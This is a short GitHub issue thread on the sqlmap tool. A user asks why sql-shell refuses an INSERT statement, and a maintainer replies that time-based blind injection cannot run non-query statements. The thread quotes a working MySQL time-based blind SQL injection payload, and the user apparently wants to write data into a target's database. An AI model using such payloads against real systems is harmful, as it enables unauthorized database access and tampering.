### ISSUE TITLE
Sql-shell insert query

### ISSUE THREAD

**Issue by Dare-Devill** [sqlmapproject/sqlmap#5299]
**cant insert data from sql-shell**

**Error**
sql-shell> 'INSERT INTO names_table (name_id) VALUES ('Gali')[22:07:57] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported

**Expected behavior**
i want to insert this values

**Target details:**
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=9' AND (SELECT 3223 FROM (SELECT(SLEEP(5)))HZPE) AND 'dZKh'='dZKh

**Comment by stamparm** [comment]
`INSERT` is not supported in `time-based blind` SQLi. you have to have an usable `stacked` SQLi
